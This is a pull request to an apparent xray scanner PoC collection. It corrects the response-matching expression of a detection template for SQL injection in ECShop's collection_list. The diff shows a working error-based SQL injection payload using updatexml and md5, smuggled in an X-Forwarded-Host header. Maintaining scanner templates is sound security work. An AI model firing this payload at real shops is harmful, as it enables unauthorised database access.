### PR TITLE
fix: 修复 ecshop-collection-list-sqli

### DIFF
--- a/pocs/ecshop-collection-list-sqli.yml
+++ b/pocs/ecshop-collection-list-sqli.yml
@@ -12,7 +12,7 @@ rules:
             headers:
                 X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:55:"1' and updatexml(1,insert(md5({{r1}}),1,1,0x7e),1) and '";|45ea207d7a2b68c49582d2d22adf953a
             follow_redirects: false
-        expression: response.body.bcontains(bytes(substr(md5(string(r1)), 1, 32)))
+        expression: response.body.bcontains(bytes(substr(md5(string(r1)), 1, 31)))
 expression: r0()
 detail:
     author: 曦shen


### PR DESCRIPTION
修复一下这个 poc，之前的写法根据 xray 的文档定义是错误的

```yaml
# Origin
expression: response.body.bcontains(bytes(substr(md5(string(r1)), 1, 32)))
# Fix
expression: response.body.bcontains(bytes(substr(md5(string(r1)), 1, 31)))
```

substr(md5(), 1, 32) 已经超出 md5 长度了。